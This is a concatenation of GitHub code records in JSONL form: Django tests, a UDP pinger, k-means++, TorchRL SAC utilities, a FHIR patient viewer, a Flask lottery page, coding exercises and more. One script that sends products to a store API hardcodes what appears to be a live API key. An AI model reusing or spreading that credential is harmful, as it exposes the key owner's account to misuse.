self.client.post(self.view_url, self.post_params)\n mocked.error.assert_called_once_with(\n \"Tried to post a microblog post on Twitter but got a ClientError,\"\n \" check your twitter keys.\")\n self.assertIn('(it worked! But twitter posting failed)',\n json.loads(response.content.decode('utf-8'))['text'])\n\n\nclass SlackSlashCommandHelpersTest(TestCase):\n\n def test_normalize_and_split_data(self):\n content = _normalize_and_split_data('My blog Post[category]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'category')\n\n def test_normalize_and_split_data_with_square_braces(self):\n content = _normalize_and_split_data('A list is like this foo[1], awesome.')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1], awesome.')\n self.assertEqual(content[1], '')\n\n def test_normalize_and_split_data_with_square_braces_and_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1][Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_square_braces_and_space_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1] [Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_multiple_categories(self):\n content = _normalize_and_split_data('My blog Post[Python, Django]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'Python, Django')\n\n def test_normalize_without_category(self):\n content = _normalize_and_split_data('My blog Post')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], '')\n\n def test_clean_category_name(self):\n category = _clean_category_name(' Category')\n self.assertEqual(category, 'category')\n","repo_name":"vintasoftware/django-knowledge-share","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"32"}
+{"seq_id":"10205583621","text":"from mysql_operation.mysql_operation import query_table\nfrom question_analyse.question_pretreatment import question_segment, build_abstract_question, \\\n extract_keywords, best_match_template\nfrom template.question_template import build_sql_sentence, build_answer\n\n\ndef answer_question_template(question: str):\n # 分词 并 词性标注\n question_seq = question_segment(question)\n # 构造抽象问句\n abstract_question = build_abstract_question(question_seq)\n # 抽取关键词字典\n keywords = extract_keywords(question_seq)\n # 问题模版类型\n type = keywords['type']\n # 最合适的问题模版\n match_template, keyword, answer_template = best_match_template(abstract_question, type)\n # 构造sql语句\n sql_sentence = build_sql_sentence(match_template, type, keywords)\n # 数据库查询\n answer_list = []\n if sql_sentence == \"\":\n answer_list.append(\"无法构建查询语句\")\n else:\n result = query_table(sql_sentence)\n if len(result) == 0:\n answer_list.append(\"无法查询\")\n else:\n for item in result:\n answer = build_answer(answer_template, item)\n answer_list.append(answer)\n return answer_list\n\n\nif __name__ == '__main__':\n print('Hello World')\n","repo_name":"MayerX/grad_project","sub_path":"question_answer/answer_question_template.py","file_name":"answer_question_template.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"72460178651","text":"from turtle import Turtle\r\n\r\n\r\nclass Score_card(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.color(\"white\")\r\n self.penup()\r\n self.goto(-70, 270)\r\n self.score = 0\r\n with open(\"data.text\") as file:\r\n self.high_score = int(file.read())\r\n self.update_score()\r\n self.hideturtle()\r\n\r\n def update_score(self):\r\n self.clear()\r\n self.write(f\"Score:{self.score} High Score:{self.high_score}\", align=\"left\", font=(\"Arial\", 15, \"bold\"))\r\n\r\n def increase_score(self):\r\n self.score += 1\r\n self.update_score()\r\n\r\n def reset(self):\r\n if self.score > self.high_score:\r\n with open(\"data.text\", mode=\"w\") as file:\r\n self.high_score = file.write(f\"{self.score}\")\r\n self.score = 0\r\n self.update_score()\r\n\r\n","repo_name":"abhinavS1911/Python-projects","sub_path":"Snake-Safari/score_card.py","file_name":"score_card.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43439390459","text":"from socket import *\r\nimport time\r\n\r\nservername='127.0.0.1'\r\nserverport= 12000\r\nclientSocket=socket(AF_INET,SOCK_DGRAM)\r\nclientSocket.settimeout(1)\r\n\r\nfor i in range(1,11):\r\n t0=time.time()\r\n clientSocket.sendto(('Ping %d %s' % (i,t0)).encode(), (servername,serverport))\r\n try:\r\n modifiedMessage,serveraddress=clientSocket.recvfrom(1024)\r\n total_time=time.time()-t0\r\n print('%d: response by %s RTT=%.3f'%(i,servername,total_time))\r\n\r\n except Exception as e:\r\n print('%d: time out!' %i)\r\nclientSocket.close()\r\n\r\n","repo_name":"NightFaint/Code-diary","sub_path":"Computer-Network/homework2/UDPPinger.py","file_name":"UDPPinger.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"2329363057","text":"\"\"\"\nhttps://leetcode-cn.com/problems/longest-string-chain/v\n\n\n1048. 最长字符串链\n给出一个单词列表,其中每个单词都由小写英文字母组成。\n\n如果我们可以在 word1 的任何地方添加一个字母使其变成 word2,那么我们认为 word1 是 word2 的前身。例如,\"abc\" 是 \"abac\" 的前身。\n\n词链是单词 [word_1, word_2, ..., word_k] 组成的序列,k >= 1,其中 word_1 是 word_2 的前身,word_2 是 word_3 的前身,依此类推。\n\n从给定单词列表 words 中选择单词组成词链,返回词链的最长可能长度。\n\n\n示例:\n\n输入:[\"a\",\"b\",\"ba\",\"bca\",\"bda\",\"bdca\"]\n输出:4\n解释:最长单词链之一为 \"a\",\"ba\",\"bda\",\"bdca\"。\n\n\n提示:\n\n1 <= words.length <= 1000\n1 <= words[i].length <= 16\nwords[i] 仅由小写英文字母组成。\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def longestStrChain(self, words: List[str]) -> int:\n word_set = {word: 1 for word in words}\n word_list = sorted(words, key=lambda x: len(x))\n for word in word_list:\n for i in range(len(word)):\n new_word = word[:i] + word[i+1:]\n word_set[word] = max(word_set[word], word_set.get(new_word, 0) + 1)\n # print(word_set)\n return max(word_set.values())\n\n# 十分简单的DP\n","repo_name":"ironboxer/leetcode","sub_path":"python/1048.py","file_name":"1048.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7407233019","text":"import random\nfrom math import sqrt\nimport matplotlib.pyplot as plt\n\ndef weighted_choice(weights):\n ''' Chooses an element with probabilty given by its weight \n on a total of weights. Uses the \"roulette method\". Info at \n http://eli.thegreenplace.net/2010/01/22/weighted-random-generation-in-python'''\n \n rnd = random.random() * sum(weights)\n for i, w in enumerate(weights):\n rnd -= w\n if rnd < 0:\n return i\n \n \ndef d(p1,p2):\n ''' Euclidean distance between two points in R^n '''\n \n return sqrt(sum( \n [(p1[i]-p2[i])**2 for i in range(len(p1))] \n ))\n \n \ndef KPlusPlus_iterate(l,m):\n ''' Given a list of points and the means already found, makes a steps of\n the k++ method '''\n \n weights= [ min([d(x1,x2) for x2 in m ]) **2 if x1 not in m else 0\n for x1 in l ]\n return l[weighted_choice(weights) ]\n \n\ndef KPlusPlus(l,k):\n ''' Implements the k++ algorithm on a list l, to be passed afterwards to\n the k-means. Returns the set of the k mean points selected '''\n \n means=[] # list of means selected\n means.append(l[random.randint(0,len(l)-1)])\n for i in range(k-1):\n means.append(KPlusPlus_iterate(l,means))\n return means\n\ndef KMeans_iterate(l,m):\n ''' Iterates one step of the k-means algorithm, returning the new clusters '''\n \n k=len(m)\n clusters=[[] for i in range(k)]\n for p in l:\n dist=[d(p,mean) for mean in m ]\n i=dist.index(min(dist))\n clusters[i].append(p)\n return clusters\n\ndef centroid(cluster):\n return tuple([\n sum([p[i] for p in cluster])/len(cluster) \n for i in range(len(cluster[0]))\n ])\n \ndef KMeans(l,m):\n ''' Implements the k-means algorithm with the means m on the list l '''\n \n m_old=[]\n m_new=m\n while m_new!=m_old:\n m_old=m_new\n clusters=KMeans_iterate(l,m_old)\n m_new=[centroid(c) for c in clusters]\n return clusters,m_new\n \n\ndef randpoint(x=1,y=1):\n ''' Returns a random point with cohordinates in \n [0,x),[0,y) '''\n try:\n return (random.random()*x,random.random()*y)\n except ValueError:\n print(\"Insert complex,real or integer number as cohordinates \")\n\n\n# now try the algorithm with random points\nx,y=1,1\npoints=[]\nfor i in range(1000):\n points.append(randpoint(x,y))\n \nx_cohord=[p[0] for p in points]\ny_cohord=[p[1] for p in points]\nplt.plot(x_cohord,y_cohord,'ro')\nplt.title('Random points in [0,%d)x[0,%d)'%(x,y))\nplt.show()\n\nk=5\nm=KPlusPlus(points,k)\nclusters, means=KMeans(points,m)\nfor i in range(k):\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,'.',mean[0],mean[1],'bo')\nplt.show()\nfor i in range(k): # plots with connected lines, to visualize differently\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,mean[0],mean[1],'bo')\nplt.show()\n \n\n \n \n \n \n \n \n \n \n \n","repo_name":"nickruggeri/Miscellanea","sub_path":"Algorithms/k_plus_plus.py","file_name":"k_plus_plus.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71829618012","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nmnist = input_data.read_data_sets(\"/home/hadoop/code/tensorflow_tutorials/python/MNIST_data/\")\nX_train = mnist.train.images\nX_test = mnist.test.images\ny_train = mnist.train.labels.astype(\"int\")\ny_test = mnist.test.labels.astype(\"int\")\n\nfeatures = tf.contrib.learn.infer_real_valued_columns_from_input(X_train)\nDNN_classifier = tf.contrib.learn.DNNClassifier(hidden_units=[300,100], n_classes=10, feature_columns=features)\nDNN_classifier.fit(x=X_train, y=y_train, batch_size=50, steps=1000)\n\nfrom sklearn.metrics import accuracy_score\ny_predict = list(DNN_classifier.predict(X_test))\naccuracy = accuracy_score(y_test, y_predict)\nprint(\"-------------------- Accuracy: \", accuracy)\n\nfrom sklearn.metrics import log_loss\ny_pred_proba = list(DNN_classifier.predict_proba(X_test))\nprint(\"----------------------- Log loss: \", log_loss(y_test, y_pred_proba))\n","repo_name":"Emilio66/machine_learning","sub_path":"02_DNN_High_Level.py","file_name":"02_DNN_High_Level.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16362466289","text":"\ndef solution(n, arr1, arr2):\n answer = []\n \n def zinsu(num):\n zin = ''\n for _ in range(n):\n zin += str(num%2)\n num = num//2\n return zin[::-1]\n \n arr1_list = list(map(zinsu, arr1))\n arr2_list = list(map(zinsu, arr2))\n \n for a1, a2 in zip(arr1_list, arr2_list):\n result = ''\n for i,j in zip(a1, a2):\n if i== \"0\" and j == \"0\":\n result += \" \"\n else:\n result += \"#\"\n \n answer.append(result)\n \n return answer","repo_name":"heweun/Algorithm_practice","sub_path":"프로그래머스/lv1/17681. [1차] 비밀지도/[1차] 비밀지도.py","file_name":"[1차] 비밀지도.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28884548102","text":"import csv\r\nimport json\r\nimport os\r\nimport requests\r\nfrom datetime import datetime\r\n\r\ndef send_product_to_api(products):\r\n # API configuration\r\n BASE_URL = \"https://api.instabuy.com.br/store/\"\r\n ENDPOINT = \"products\"\r\n API_KEY = \"Mq1EWAXiHwraLIQgfq4stmUxKiM6VpC5Xd9o3wuX1Go\"\r\n\r\n headers = {\r\n \"api-key\": f\"Bearer {API_KEY}\",\r\n \"Content-Type\": \"application/json\"\r\n }\r\n \r\n response = requests.put(f\"{BASE_URL}{ENDPOINT}\", headers=headers, params = products)\r\n return response\r\n\r\ndef file_in_same_directory(file_name):\r\n script_dir = os.path.dirname(os.path.abspath(__file__))\r\n file_path = os.path.join(script_dir, file_name)\r\n return file_path\r\n\r\ndef datetime_to_iso(date_str):\r\n if(len(date_str) == 46 and date_str[37]=='T'):\r\n start_date, end_date = date_str.split('/')\r\n return datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S.%f')\r\n if(date_str == \"\"):\r\n return \"\"\r\n months = {\r\n \"JAN\": 1, \"FEV\": 2, \"MAR\": 3, \"ABR\": 4, \"MAI\": 5, \"JUN\": 6,\r\n \"JUL\": 7, \"AGO\": 8, \"SET\": 9, \"OUT\": 10, \"NOV\": 11, \"DEZ\": 12\r\n }\r\n day, abb_month, year = date_str.split('-')\r\n day = int(day)\r\n month = months[abb_month]\r\n if(day>31 or month>12):\r\n return \"\"\r\n if(day>29 and month==2):\r\n return \"\"\r\n year = int(year) + 2000\r\n hour, minute, second = 0, 0, 0\r\n f = 672000\r\n date_iso = str(year)+'-'+str(month)+'-'+str(day)+'T'+str(hour)+':'+str(minute)+':'+str(second)+'.'+str(f)\r\n return datetime.strptime(date_iso, '%Y-%m-%dT%H:%M:%S.%f')\r\n\r\ndef csv_to_json():\r\n #Read CSV and add data to a dictionary\r\n with open(file_in_same_directory('items.csv'), encoding=\"utf8\") as csvFile:\r\n csvReader = csv.reader(csvFile, delimiter=';')\r\n data_list = list()\r\n for csvRow in csvReader:\r\n data_list.append(csvRow)\r\n\r\n data_list.pop(0)\r\n #Converting string to other types in list\r\n for properties in data_list:\r\n properties[3] = properties[3].replace(',', '.')\r\n properties[3] = float(properties[3])\r\n properties[4] = properties[4].replace(',', '.')\r\n if(properties[4] != ''):\r\n properties[4] = float(properties[4])\r\n properties[5] = datetime_to_iso(properties[5])\r\n properties[6] = properties[6].replace(',', '.')\r\n properties[6] = float(properties[6])\r\n properties[7] = eval(properties[7])\r\n\r\n data_list.insert(0, ['internal_code', 'barcodes', 'name', 'price', 'promo_price', 'promo_end_at', 'stock', 'visible'])\r\n #data = [dict(zip(data_list[0], csvRow)) for csvRow in data_list]\r\n data = []\r\n for csvRow in data_list:\r\n item_dict = {\r\n 'internal_code': csvRow[0],\r\n 'barcodes': csvRow[1],\r\n 'name': csvRow[2],\r\n 'price': csvRow[3],\r\n 'promo_price': csvRow[4],\r\n 'promo_end_at': csvRow[5],\r\n 'stock': csvRow[6],\r\n 'visible': csvRow[7],\r\n 'promo_start_at': csvRow[5],\r\n 'unit_type': 'UNI'\r\n }\r\n data.append(item_dict)\r\n\r\n data.pop(0)\r\n\r\n #Write data to a Json file\r\n with open(file_in_same_directory('items.json'), \"w\") as jsonFile:\r\n jsonFile.write(json.dumps(data, indent=4, sort_keys=True, default=str))\r\n\r\ndef main():\r\n try:\r\n json_file = csv_to_json()\r\n response = send_product_to_api(json_file)\r\n print(f\"Reason: {response.reason}\\nStatus Code: {response.status_code}\")\r\n\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"victorhugomr/integration-aug-23","sub_path":"integration-aug-23.py","file_name":"integration-aug-23.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"46162133052","text":"import tkinter as tk\nfrom model.observation.observationCode import ObservationCode\nfrom view.moreInfo import MoreInfo\nimport dateutil.parser\n\n\nclass PatientInfo(tk.Frame):\n\n def __init__(self, master, controller, patient, *args, **kwargs):\n \"\"\"\n Display oh patient name and cholesterol info\n :param master: master window\n :param controller: controller to request data from model\n :param patient: patient to get info from\n \"\"\"\n super(PatientInfo, self).__init__(master, *args, **kwargs)\n self.configure(width=950, height=30)\n\n # initialising variables\n self.id = patient.get_identifier()\n self.controller = controller\n self.patient = patient\n\n self.controller.update_patient_obs(ObservationCode.CHOLESTEROL, patient)\n self.controller.update_patient_obs(ObservationCode.BLOOD_PRESSURE, patient)\n self.controller.update_patient_obs(ObservationCode.TOBACCO_SMOKING_STATUS_NHIS, patient)\n\n # creating and placing display\n self.name_label = tk.Label(self, text=patient.get_display_name(), relief=\"groove\")\n self.name_label.place(x=0, y=0, width=200, height=30)\n\n cholesterol = patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value = tk.Label(self, text=str(cholesterol.get_value()),\n relief=\"groove\")\n self.date_value = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.chol_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value = tk.Label(self, text=\"N/A\", relief=\"groove\")\n\n blood_test = patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood_test is not None:\n date = dateutil.parser.parse(str(blood_test.get_date()))\n self.sys_value = tk.Label(self, text=str(blood_test.get_value()['Systolic_value']), relief=\"groove\")\n self.dia_value = tk.Label(self, text=str(blood_test.get_value()['Diastolic_value']), relief=\"groove\")\n self.date_value2 = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(\n date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.sys_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.dia_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value2 = tk.Label(self, text=\"N/A\", relief=\"groove\")\n self.chol_value.place(x=200, y=0, width=175, height=30)\n self.date_value.place(x=375, y=0, width=125, height=30)\n self.dia_value.place(x=500, y=0, width=100, height=30)\n self.sys_value.place(x=600, y=0, width=100, height=30)\n self.date_value2.place(x=700, y=0, width=125, height=30)\n\n # Button to open more info window\n more_info = tk.Button(self, text=\"More Patient Info\", relief=\"groove\", bg=\"lime\", command=self.__more_info_window)\n more_info.place(x=825, y=0, width=100, height=30)\n\n def update_obs(self):\n \"\"\"\n updates cholesterol value to most recent\n :return: None\n \"\"\"\n cholesterol = self.patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value['text'] = str(cholesterol.get_value())\n self.date_value['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n blood = self.patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood is not None:\n date = dateutil.parser.parse(str(blood.get_date()))\n self.sys_value['text'] = str(blood.get_value()['Systolic_value'])\n self.dia_value['text'] = str(blood.get_value()['Diastolic_value'])\n self.date_value2['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n def highlight_text(self):\n \"\"\"\n Highlight cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'red'\n self.name_label['fg'] = 'red'\n\n def highlight_dia(self):\n self.dia_value['fg'] = 'purple'\n\n def default_dia(self):\n self.dia_value['fg'] = 'black'\n\n def highlight_sys(self):\n self.sys_value['fg'] = 'purple'\n\n def default_sys(self):\n self.sys_value['fg'] = 'black'\n\n def default_text(self):\n \"\"\"\n Remove highlight from cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'black'\n self.name_label['fg'] = 'black'\n\n def __more_info_window(self):\n \"\"\"\n Open more info for patient\n :return: None\n \"\"\"\n self.wait_window(MoreInfo(self, self.patient, self.controller))\n","repo_name":"mt-empty/FHIR_application","sub_path":"src/view/patientInfo.py","file_name":"patientInfo.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20673783185","text":"import torch\nfrom tensordict.nn import InteractionType, TensorDictModule\nfrom tensordict.nn.distributions import NormalParamExtractor\nfrom torch import nn, optim\nfrom torchrl.collectors import SyncDataCollector\nfrom torchrl.data import TensorDictPrioritizedReplayBuffer, TensorDictReplayBuffer\nfrom torchrl.data.replay_buffers.storages import LazyMemmapStorage\nfrom torchrl.envs import Compose, DoubleToFloat, EnvCreator, ParallelEnv, TransformedEnv\nfrom torchrl.envs.libs.gym import GymEnv\nfrom torchrl.envs.transforms import RewardScaling\nfrom torchrl.envs.utils import ExplorationType, set_exploration_type\nfrom torchrl.modules import MLP, ProbabilisticActor, ValueOperator\nfrom torchrl.modules.distributions import TanhNormal\nfrom torchrl.objectives import SoftUpdate\nfrom torchrl.objectives.sac import SACLoss\n\n\n# ====================================================================\n# Environment utils\n# -----------------\n\n\ndef env_maker(task, frame_skip=1, device=\"cpu\", from_pixels=False):\n return GymEnv(task, device=device, frame_skip=frame_skip, from_pixels=from_pixels)\n\n\ndef apply_env_transforms(env, reward_scaling=1.0):\n transformed_env = TransformedEnv(\n env,\n Compose(\n RewardScaling(loc=0.0, scale=reward_scaling),\n DoubleToFloat(in_keys=[\"observation\"], in_keys_inv=[]),\n ),\n )\n return transformed_env\n\n\ndef make_environment(cfg):\n \"\"\"Make environments for training and evaluation.\"\"\"\n parallel_env = ParallelEnv(\n cfg.collector.env_per_collector,\n EnvCreator(lambda: env_maker(task=cfg.env.name)),\n )\n parallel_env.set_seed(cfg.env.seed)\n\n train_env = apply_env_transforms(parallel_env)\n\n eval_env = TransformedEnv(\n ParallelEnv(\n cfg.collector.env_per_collector,\n EnvCreator(lambda: env_maker(task=cfg.env.name)),\n ),\n train_env.transform.clone(),\n )\n return train_env, eval_env\n\n\n# ====================================================================\n# Collector and replay buffer\n# ---------------------------\n\n\ndef make_collector(cfg, train_env, actor_model_explore):\n \"\"\"Make collector.\"\"\"\n collector = SyncDataCollector(\n train_env,\n actor_model_explore,\n frames_per_batch=cfg.collector.frames_per_batch,\n max_frames_per_traj=cfg.collector.max_frames_per_traj,\n total_frames=cfg.collector.total_frames,\n device=cfg.collector.collector_device,\n )\n collector.set_seed(cfg.env.seed)\n return collector\n\n\ndef make_replay_buffer(\n batch_size,\n prb=False,\n buffer_size=1000000,\n buffer_scratch_dir=\"/tmp/\",\n device=\"cpu\",\n prefetch=3,\n):\n if prb:\n replay_buffer = TensorDictPrioritizedReplayBuffer(\n alpha=0.7,\n beta=0.5,\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n else:\n replay_buffer = TensorDictReplayBuffer(\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n return replay_buffer\n\n\n# ====================================================================\n# Model\n# -----\n\n\ndef get_activation(cfg):\n if cfg.network.activation == \"relu\":\n return nn.ReLU\n elif cfg.network.activation == \"tanh\":\n return nn.Tanh\n elif cfg.network.activation == \"leaky_relu\":\n return nn.LeakyReLU\n else:\n raise NotImplementedError\n\n\ndef make_sac_agent(cfg, train_env, eval_env, device):\n \"\"\"Make SAC agent.\"\"\"\n # Define Actor Network\n in_keys = [\"observation\"]\n action_spec = train_env.action_spec\n if train_env.batch_size:\n action_spec = action_spec[(0,) * len(train_env.batch_size)]\n actor_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 2 * action_spec.shape[-1],\n \"activation_class\": get_activation(cfg),\n }\n\n actor_net = MLP(**actor_net_kwargs)\n\n dist_class = TanhNormal\n dist_kwargs = {\n \"min\": action_spec.space.minimum,\n \"max\": action_spec.space.maximum,\n \"tanh_loc\": False,\n }\n\n actor_extractor = NormalParamExtractor(\n scale_mapping=f\"biased_softplus_{cfg.network.default_policy_scale}\",\n scale_lb=cfg.network.scale_lb,\n )\n actor_net = nn.Sequential(actor_net, actor_extractor)\n\n in_keys_actor = in_keys\n actor_module = TensorDictModule(\n actor_net,\n in_keys=in_keys_actor,\n out_keys=[\n \"loc\",\n \"scale\",\n ],\n )\n actor = ProbabilisticActor(\n spec=action_spec,\n in_keys=[\"loc\", \"scale\"],\n module=actor_module,\n distribution_class=dist_class,\n distribution_kwargs=dist_kwargs,\n default_interaction_type=InteractionType.RANDOM,\n return_log_prob=False,\n )\n\n # Define Critic Network\n qvalue_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 1,\n \"activation_class\": get_activation(cfg),\n }\n\n qvalue_net = MLP(\n **qvalue_net_kwargs,\n )\n\n qvalue = ValueOperator(\n in_keys=[\"action\"] + in_keys,\n module=qvalue_net,\n )\n\n model = nn.ModuleList([actor, qvalue]).to(device)\n\n # init nets\n with torch.no_grad(), set_exploration_type(ExplorationType.RANDOM):\n td = eval_env.reset()\n td = td.to(device)\n for net in model:\n net(td)\n del td\n eval_env.close()\n\n return model, model[0]\n\n\n# ====================================================================\n# SAC Loss\n# ---------\n\n\ndef make_loss_module(cfg, model):\n \"\"\"Make loss module and target network updater.\"\"\"\n # Create SAC loss\n loss_module = SACLoss(\n actor_network=model[0],\n qvalue_network=model[1],\n num_qvalue_nets=2,\n loss_function=cfg.optimization.loss_function,\n delay_actor=False,\n delay_qvalue=True,\n )\n loss_module.make_value_estimator(gamma=cfg.optimization.gamma)\n\n # Define Target Network Updater\n target_net_updater = SoftUpdate(\n loss_module, eps=cfg.optimization.target_update_polyak\n )\n return loss_module, target_net_updater\n\n\ndef make_sac_optimizer(cfg, loss_module):\n \"\"\"Make SAC optimizer.\"\"\"\n optimizer = optim.Adam(\n loss_module.parameters(),\n lr=cfg.optimization.lr,\n weight_decay=cfg.optimization.weight_decay,\n )\n return optimizer\n","repo_name":"feifeifei416/rl","sub_path":"examples/sac/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"41740149736","text":"import sys\nfrom collections import deque\n\nn,m=map(int,sys.stdin.readline().split(\" \"))\n\narr=[list(map(int,sys.stdin.readline().strip())) for _ in range(n)]\n\nfixed_arr=[]\n\nmove=[[1,-1,0,0],[0,0,1,-1]]\n\nchecked=[[0]*m for _ in range(n)]\n\nque=deque()\n\ncount=0\n\nstack=[] ## 배열들 보관했다가 값 바꿔줌\n\nindex=0\n\nfor i in range(n): ## 먼저 한번 돌리면서 각각 연결되어있는 0들이 몇개씩 연결되있는지 센다음 표시해주고 나중에 구분을 위해 index도 부여해서 리스트로 [겂,인덱스]이렇게 만든다\n for j in range(m):\n if(arr[i][j]==1):\n arr[i][j]=-1\n if(arr[i][j]==0 and checked[i][j]==0):\n count+=1\n checked[i][j]=1\n stack.append([i,j])\n que.append([i,j])\n while(que):\n item=que.popleft()\n for k in range(4):\n x=item[0]+move[0][k]\n y=item[1]+move[1][k]\n if(0<=x\")\ndef show_lottery_details(id):\n lottery = requests.get(f\"http://localhost:5000/lottery/{id}\").json()\n\n txs = lottery['users'] \n \n buffer = BytesIO()\n \n qr_data = f\"tron:{lottery['address']}?token=TRX&amount={lottery['prize']}¬e={lottery['id']}\"\n qr = qrcode.QRCode(version=1, box_size=4, border=1)\n qr.add_data(qr_data)\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"#F0B90B\", back_color=\"#2c2c2c\")\n img.save(buffer, format=\"PNG\")\n qr_png = buffer.getvalue()\n qr_base64 = base64.b64encode(qr_png).decode()\n\n return render_template(\"lotto.html\", lottery=lottery, txs=txs, qr=qr_base64)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=4999)","repo_name":"dreistein33/jackpotron","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38194565564","text":"import sys\nimport os\n\nmodels_path = \"models\"\n# this will break any attempt to import xformers which will prevent stability diffusion repo from trying to use it\nif \"--xformers\" not in \"\".join(sys.argv):\n sys.modules[\"xformers\"] = None\n\nif \"--no-half-vae\" not in \"\".join(sys.argv):\n sys.argv.append('--no-half-vae')\nsys.argv.append(f'--clip-models-path={models_path}/CLIP')\n","repo_name":"ChengLong1222/stable-diffusion-webui","sub_path":"modules/import_hook.py","file_name":"import_hook.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"23744291654","text":"#Christan Park\n#worksheet on strings \nimport os\nos.system(\"cls\")\n\n#Question 1: get first middle and last letters\n\n#method 1\na = \"James\"\nprint(len(a)) #number of letter in word\nprint(a[0], end='') #get first letter\nprint(a[2], end='') #put middle letter on same line\nprint(a[4]) #put last letter on same line\n\n#method 2\nword = input('Your word is ') #get word from user\nnumber = (len(word)) #get the number of letters in the word\nfirst = word[0] #get first letter of word\nmiddleNumber = int(number/2) #get the number of the middle digit in word\nmiddle = word[middleNumber] #get the middle letter\nlast = word[number-1] #get last letter\nprint(first+middle+last) #print first middle and last letter together \n\n\n#Question 2: Create a string made of the middle three characters\n\nword = input('Your word is ') #get word from user\nnumber = len(word) #get number of letters in the word\nmiddle2=number//2 #double division -> integer division\nmiddleFirst = word[middle2-1:middle2+2]\nprint(middleFirst)\n#print(\"The middle three characters are:\",word[middle2-1]+word[middle2]+word[middle2+1])\n\n\n#Question 3: Append New string in the middle of a given string\n\nword = input('Your word is ') #get word from user\nword2 = input('Your second word is ') #get seocnd word \nmiddleNumber2 = (len(word)//2) #get which number letter is the middle\nhalf1=len(word)//2 #make half1 = middle letter number 